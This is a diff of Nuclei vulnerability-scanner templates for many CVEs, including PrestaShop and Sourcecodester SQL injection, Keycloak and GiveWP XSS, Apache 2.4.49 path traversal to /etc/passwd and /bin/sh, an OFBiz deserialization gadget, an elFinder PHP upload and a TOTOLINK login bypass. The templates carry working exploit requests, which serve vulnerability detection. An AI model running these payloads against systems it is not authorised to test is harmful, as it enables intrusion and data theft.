- https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9
- https://nvd.nist.gov/vuln/detail/CVE-2020-26248
remediation: Fixed in 4.2.1.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
cvss-score: 8.2
cve-id: CVE-2020-26248
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2020,sqli,prestshop,packetstorm
requests:
- raw:
- |
@timeout: 20s
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "average_grade")'
condition: and
# Enhanced by md on 2022/12/08

View File

@ -0,0 +1,45 @@
id: CVE-2020-29284
info:
name: Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection
author: edoardottt
severity: critical
description: |
Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
reference:
- https://www.exploit-db.com/exploits/48984
- https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
- https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-29284
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-29284
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve2020,tablereservation,sqli,unauth,edb,cve
requests:
- method: GET
path:
- "{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=6'
- type: word
part: body
words:
- "Restaurent Tables"
- "Chair List"
condition: and
- type: status
status:
- 200
# Enhanced by md on 2022/12/08

View File

@ -1,7 +1,7 @@
id: CVE-2020-35729 id: CVE-2020-35729
info: info:
name: Klog Server <=2.41- Unauthenticated Command Injection name: Klog Server <=2.41 - Unauthenticated Command Injection
author: dwisiswant0 author: dwisiswant0
severity: critical severity: critical
description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7. description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7.

View File

@ -1,7 +1,7 @@
id: CVE-2020-35846 id: CVE-2020-35846
info: info:
name: Agentejo Cockpit < 0.11.2 NoSQL Injection name: Agentejo Cockpit < 0.11.2 - NoSQL Injection
author: dwisiswant0 author: dwisiswant0
severity: critical severity: critical
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value. description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value.

View File

@ -1,7 +1,7 @@
id: CVE-2020-35847 id: CVE-2020-35847
info: info:
name: Agentejo Cockpit <0.11.2 NoSQL Injection name: Agentejo Cockpit <0.11.2 - NoSQL Injection
author: dwisiswant0 author: dwisiswant0
severity: critical severity: critical
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller. description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.

View File

@ -1,7 +1,7 @@
id: CVE-2021-20114 id: CVE-2021-20114
info: info:
name: TCExam <= 14.8.1 Sensitive Information Exposure name: TCExam <= 14.8.1 - Sensitive Information Exposure
author: push4d author: push4d
severity: high severity: high
description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files. description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files.

View File

@ -0,0 +1,54 @@
id: CVE-2021-20323
info:
name: Keycloak < 18.0.0 - Cross Site Scripting
author: ndmalc
severity: medium
description: |
Keycloak before 18.0.0 and after 10.0.0 allows a reflected XSS on client-registrations endpoint. On POST request, when a request is submitted, the application does not sanitize unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as html. This can be performed on any realm present on the Keycloak instance. Currently, due to the bug requiring Content-Type application/json and is submitted via a POST, there is no common path to exploit that have a user impact.
reference:
- https://github.com/keycloak/keycloak/security/advisories/GHSA-m98g-63qj-fp8j
- https://bugzilla.redhat.com/show_bug.cgi?id=2013577
- https://access.redhat.com/security/cve/CVE-2021-20323
- https://github.com/ndmalc/CVE-2021-20323
- https://github.com/keycloak/keycloak/commit/3aa3db16eac9b9ed8c5335ac86f5f50e0c68662d
- https://nvd.nist.gov/vuln/detail/CVE-2021-20323
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-20323
cwe-id: CWE-79
metadata:
shodan-query: html:"Keycloak"
verified: "true"
tags: cve,cve2021,keycloak,xss
requests:
- method: POST
path:
- "{{BaseURL}}/auth/realms/master/clients-registrations/default"
- "{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect"
- "{{BaseURL}}/realms/master/clients-registrations/default"
- "{{BaseURL}}/realms/master/clients-registrations/openid-connect"
headers:
Content-Type: application/json
body: "{\"Test<img src=x onerror=alert(document.domain)>\":1}"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Unrecognized field "Test<img src=x onerror=alert(document.domain)>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 400

View File

@ -0,0 +1,37 @@
id: CVE-2021-24827
info:
name: Asgaros Forum < 1.15.13 - Unauthenticated SQL Injection
author: theamanrawat
severity: critical
description: |
The Asgaros Forum WordPress plugin before 1.15.13 does not validate and escape user input when subscribing to a topic before using it in a SQL statement, leading to an unauthenticated SQL injection issue.
reference:
- https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1
- https://wordpress.org/plugins/asgaros-forum/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24827
- https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24827
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve2022,wp-plugin,asgaros-forum,unauth,wpscan,cve,wordpress,wp,sqli
requests:
- raw:
- |
@timeout: 15s
GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "asgarosforum")'
condition: and

View File

@ -0,0 +1,35 @@
id: CVE-2021-25099
info:
name: Give < 2.17.3 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
The GiveWP WordPress plugin before 2.17.3 does not sanitise and escape the form_id parameter before outputting it back in the response of an unauthenticated request via the give_checkout_login AJAX action, leading to a Reflected Cross-Site Scripting.
reference:
- https://wpscan.com/vulnerability/87a64b27-23a3-40f5-a3d8-0650975fee6f
- https://wordpress.org/plugins/give/
- https://nvd.nist.gov/vuln/detail/CVE-2021-25099
classification:
cve-id: CVE-2021-25099
metadata:
verified: true
tags: cve,cve2021,wordpress,wp-plugin,wp,xss,give,unauth
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=give_checkout_login&form_id=xxxxxx"><script>alert(document.domain)</script>
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<script>alert(document.domain)</script>")'
- 'contains(body, "give_user_login")'
condition: and

View File

@ -0,0 +1,53 @@
id: CVE-2021-30128
info:
name: Apache OFBiz <17.12.07 - Arbitrary Code Execution
author: For3stCo1d
severity: critical
description: Apache OFBiz has unsafe deserialization prior to 17.12.07 version
reference:
- https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E
- https://nvd.nist.gov/vuln/detail/CVE-2021-30128
classification:
cve-id: CVE-2021-30128
metadata:
verified: true
fofa-query: app="Apache_OFBiz"
tags: cve,cve2021,apache,ofbiz,deserialization,rce
requests:
- raw:
- |
POST /webtools/control/SOAPService HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-Map>
<map-Entry>
<map-Key>
<cus-obj>{{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}}</cus-obj>
</map-Key>
<map-Value>
<std-String/>
</map-Value>
</map-Entry>
</map-Map>
</ser>
</soapenv:Body>
</soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- 'value="errorMessage"'

View File

@ -0,0 +1,37 @@
id: CVE-2021-3110
info:
name: PrestaShop 1.7.7.0 - SQL Injection
author: Jaimin Gondaliya
severity: critical
description: |
PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e
- https://www.exploit-db.com/exploits/49410
- https://nvd.nist.gov/vuln/detail/CVE-2021-3110
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-3110
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,prestshop,edb
requests:
- raw:
- |
@timeout: 20s
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "average_grade")'
condition: and
# Enhanced by md on 2022/12/08

View File

@ -1,7 +1,7 @@
id: CVE-2021-31682 id: CVE-2021-31682
info: info:
name: WebCTRL OEM <= 6.5 Cross-Site Scripting name: WebCTRL OEM <= 6.5 - Cross-Site Scripting
author: gy741,dhiyaneshDk author: gy741,dhiyaneshDk
severity: medium severity: medium
description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter. description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter.

View File

@ -1,11 +1,11 @@
id: CVE-2021-33851 id: CVE-2021-33851
info: info:
name: Customize Login Image < 3.5.3 - Cross-Site Scripting name: WordPress Customize Login Image <3.5.3 - Cross-Site Scripting
author: 8authur author: 8authur
severity: medium severity: medium
description: | description: |
A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the "Custom logo link" executes whenever the user opens the Settings Page of the "Customize Login Image" Plugin. WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
reference: reference:
- https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203 - https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203
- https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html - https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html
@ -62,3 +62,5 @@ requests:
regex: regex:
- 'name="_wpnonce" value="([0-9a-zA-Z]+)"' - 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
internal: true internal: true
# Enhanced by md on 2022/12/08

View File

@ -15,7 +15,7 @@ info:
cvss-score: 7.5 cvss-score: 7.5
cve-id: CVE-2021-35380 cve-id: CVE-2021-35380
cwe-id: CWE-22 cwe-id: CWE-22
tags: cve,cve2022,termtalk,lfi,unauth,lfr,edb tags: cve,cve2021,termtalk,lfi,unauth,lfr,edb
requests: requests:
- method: GET - method: GET

View File

@ -16,7 +16,9 @@ info:
cve-id: CVE-2021-35587 cve-id: CVE-2021-35587
cwe-id: CWE-502 cwe-id: CWE-502
metadata: metadata:
verified: true
fofa-query: body="/oam/pages/css/login_page.css" fofa-query: body="/oam/pages/css/login_page.css"
shodan-query: http.title:"Oracle Access Management"
tags: cve,cve2021,oam,rce,java,unauth,oracle,kev tags: cve,cve2021,oam,rce,java,unauth,oracle,kev
requests: requests:

View File

@ -1,7 +1,7 @@
id: CVE-2021-37704 id: CVE-2021-37704
info: info:
name: phpinfo Resource Exposure name: phpfastcache - phpinfo Resource Exposure
author: whoever author: whoever
severity: medium severity: medium
description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache. description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache.
@ -15,7 +15,7 @@ info:
cvss-score: 4.3 cvss-score: 4.3
cve-id: CVE-2021-37704 cve-id: CVE-2021-37704
cwe-id: CWE-668 cwe-id: CWE-668
tags: cve,cve2021,exposure,phpfastcache,phpinfo tags: cve,cve2021,exposure,phpfastcache,phpinfo,phpsocialnetwork
requests: requests:
- method: GET - method: GET
@ -23,6 +23,7 @@ requests:
- "{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php" - "{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php"
- "{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php" - "{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"
stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word

View File

@ -1,7 +1,7 @@
id: CVE-2021-38751 id: CVE-2021-38751
info: info:
name: ExponentCMS <= 2.6 Host Header Injection name: ExponentCMS <= 2.6 - Host Header Injection
author: dwisiswant0 author: dwisiswant0
severity: medium severity: medium
description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack

View File

@ -1,7 +1,7 @@
id: CVE-2021-40438 id: CVE-2021-40438
info: info:
name: Apache <= 2.4.48 Mod_Proxy SSRF name: Apache <= 2.4.48 - Mod_Proxy SSRF
author: pdteam author: pdteam
severity: critical severity: critical
description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user. description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.

View File

@ -1,7 +1,7 @@
id: CVE-2021-41174 id: CVE-2021-41174
info: info:
name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting name: Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting
author: pdteam author: pdteam
severity: medium severity: medium
description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions. description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.

View File

@ -4,7 +4,8 @@ info:
name: Apache 2.4.49 - Path Traversal and Remote Code Execution name: Apache 2.4.49 - Path Traversal and Remote Code Execution
author: daffainfo,666asd author: daffainfo,666asd
severity: high severity: high
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. description: |
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
reference: reference:
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773 - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
@ -12,15 +13,14 @@ info:
- https://twitter.com/ptswarm/status/1445376079548624899 - https://twitter.com/ptswarm/status/1445376079548624899
- https://twitter.com/h4x0r_dz/status/1445401960371429381 - https://twitter.com/h4x0r_dz/status/1445401960371429381
- https://github.com/blasty/CVE-2021-41773 - https://github.com/blasty/CVE-2021-41773
remediation: Update to Apache HTTP Server 2.4.50 or later.
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5 cvss-score: 7.5
cve-id: CVE-2021-41773 cve-id: CVE-2021-41773
cwe-id: CWE-22 cwe-id: CWE-22
metadata: metadata:
shodan-query: apache version:2.4.49
verified: "true" verified: "true"
shodan-query: Apache 2.4.49
tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev
variables: variables:
@ -32,6 +32,10 @@ requests:
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
- |
GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
Host: {{Hostname}}
- | - |
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
@ -42,7 +46,6 @@ requests:
stop-at-first-match: true stop-at-first-match: true
matchers-condition: or matchers-condition: or
matchers: matchers:
- type: regex - type: regex
name: LFI name: LFI
regex: regex:

View File

@ -0,0 +1,45 @@
id: CVE-2021-42887
info:
name: TOTOLINK - Authentication Bypass
author: gy741
severity: critical
description: |
In TOTOLINK EX1200T V4.1.2cu.5215, an attacker can bypass login by sending a specific request through formLoginAuth.htm.
reference:
- https://nvd.nist.gov/vuln/detail/cve-2021-42887
- https://github.com/p1Kk/vuln/blob/main/totolink_ex1200t_login_bypass.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
cvss-score: 9.8
cve-id: CVE-2021-42887
cwe-id: CWE-287
metadata:
shodan-query: title:"TOTOLINK"
tags: totolink,auth-bypass,cve,cve2021,router
requests:
- raw:
- |
GET /login.htm HTTP/1.1
Host: {{Hostname}}
- |
GET /formLoginAuth.htm?authCode=1&userName=admin&goURL=&action=login HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- "TOTOLINK"
- type: word
part: header_2
words:
- "Set-Cookie: SESSION_ID="
- type: status
status:
- 302

View File

@ -0,0 +1,52 @@
id: CVE-2021-43421
info:
name: Studio-42 elFinder < 2.1.60 - Arbitrary File Upload
author: akincibor
severity: critical
description: |
A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code.
reference:
- https://github.com/Studio-42/elFinder/issues/3429
- https://nvd.nist.gov/vuln/detail/CVE-2021-43421
- https://twitter.com/infosec_90/status/1455180286354919425
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-43421
cwe-id: CWE-434
metadata:
verified: "true"
tags: cve,cve2021,elfinder,upload,rce,intrusive
requests:
- raw:
- |
GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1
Host: {{Hostname}}
- |
GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1
Host: {{Hostname}}
Accept: */*
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_3, "{{randstr_1}}")'
- "status_code == 200"
condition: and
extractors:
- type: regex
name: hash
group: 1
regex:
- '"hash"\:"(.*?)"\,'
internal: true

View File

@ -0,0 +1,47 @@
id: CVE-2021-43510
info:
name: Sourcecodester Simple Client Management System 1.0 - SQL Injection
author: edoardottt
severity: critical
description: |
Sourcecodester Simple Client Management System 1.0 contains a SQL injection vulnerability via the username field in login.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://github.com/r4hn1/Simple-Client-Management-System-Exploit/blob/main/CVE-2021-43510
- https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-43510
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-43510
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,simpleclientmanagement,sqli,auth-bypass
requests:
- raw:
- |
POST /classes/Login.php?f=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin'+or+'1'%3d'1'--+-&password=as
- |
GET / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
req-condition: true
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'contains(all_headers_1, "text/html")'
- 'status_code_1 == 200'
- 'contains(body_1, "{\"status\":\"success\"}")'
- 'contains(body_2, "Welcome to Simple Client")'
condition: and
# Enhanced by md on 2022/12/08

View File

@ -17,18 +17,22 @@ info:
metadata: metadata:
shodan-query: http.html:"kkFileView" shodan-query: http.html:"kkFileView"
verified: "true" verified: "true"
tags: cve,cve2021,kkfileview,traversal tags: cve,cve2021,kkfileview,traversal,lfi
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd" - "{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd"
- "{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"
stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:[x*]:0:0" - "root:.*:0:0:"
- "for 16-bit app support"
condition: or
- type: status - type: status
status: status:

View File

@ -1,7 +1,7 @@
id: CVE-2021-43778 id: CVE-2021-43778
info: info:
name: GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability. name: GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.
author: cckuailong author: cckuailong
severity: high severity: high
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.

View File

@ -1,20 +1,25 @@
id: unauth-rlm id: CVE-2021-44152
info: info:
name: Reprise License Manager 14.2 - Authentication Bypass name: Reprise License Manager 14.2 - Authentication Bypass
author: Akincibor author: Akincibor
severity: critical severity: critical
description: Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user. description: |
Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-44152
- https://reprisesoftware.com/admin/rlm-admin-download.php?&euagree=yes - https://reprisesoftware.com/admin/rlm-admin-download.php?&euagree=yes
- http://packetstormsecurity.com/files/165186/Reprise-License-Manager-14.2-Unauthenticated-Password-Change.html - http://packetstormsecurity.com/files/165186/Reprise-License-Manager-14.2-Unauthenticated-Password-Change.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44152
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2021-44152 cve-id: CVE-2021-44152
cwe-id: CWE-287 cwe-id: CWE-287
tags: unauth,rlm,packetstorm metadata:
verified: true
shodan-query: http.html:"Reprise License Manager"
google-dork: inurl:"/goforms/menu"
tags: cve2021,rlm,auth-bypass,packetstorm,cve
requests: requests:
- method: GET - method: GET
@ -23,13 +28,13 @@ requests:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status
status:
- 200
- type: word - type: word
part: body part: body
words: words:
- "RLM Administration Commands" - "RLM Administration Commands"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/03 # Enhanced by mp on 2022/06/03

View File

@ -1,15 +1,15 @@
id: CVE-2021-44451 id: CVE-2021-44451
info: info:
name: Apache Superset Default Login name: Apache Superset - Default Login
author: dhiyaneshDK author: dhiyaneshDK
severity: medium severity: medium
description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way. description: |
Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
reference: reference:
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
- https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb - https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb
remediation: Users should upgrade to Apache Superset 1.4.0 or higher. - https://nvd.nist.gov/vuln/detail/CVE-2021-44451
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5 cvss-score: 6.5
@ -25,17 +25,18 @@ requests:
- | - |
GET /login/ HTTP/1.1 GET /login/ HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Origin: {{BaseURL}}
- | - |
POST /login/ HTTP/1.1 POST /login/ HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/admin/airflow/login
csrf_token={{csrf_token}}&username={{username}}&password={{password}} csrf_token={{csrf_token}}&username={{username}}&password={{password}}
- |
GET /dashboard/list/ HTTP/1.1
Host: {{Hostname}}
attack: pitchfork attack: pitchfork
payloads: payloads:
username: username:
@ -43,32 +44,25 @@ requests:
password: password:
- admin - admin
req-condition: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: header_2
words:
- 'session'
- type: word
part: body_3
words:
- 'DashboardFilterStateRestApi'
extractors: extractors:
- type: regex - type: regex
name: csrf_token name: csrf_token
group: 1 group: 1
part: body part: body
internal: true
regex: regex:
- 'value="(.*?)">' - 'name="csrf_token" type="hidden" value="(.*)"'
internal: true
matchers-condition: and
matchers:
- type: word
part: body
condition: and
words:
- '<title>Redirecting...</title>'
- '<h1>Redirecting...</h1'
- '<a href="/">'
- type: word
part: header
words:
- 'session'
- type: status
status:
- 302
# Enhanced by mp on 2022/03/02

View File

@ -1,7 +1,7 @@
id: CVE-2021-45232 id: CVE-2021-45232
info: info:
name: Apache APISIX Dashboard <2.10.1 API Unauthorized Access name: Apache APISIX Dashboard <2.10.1 - API Unauthorized Access
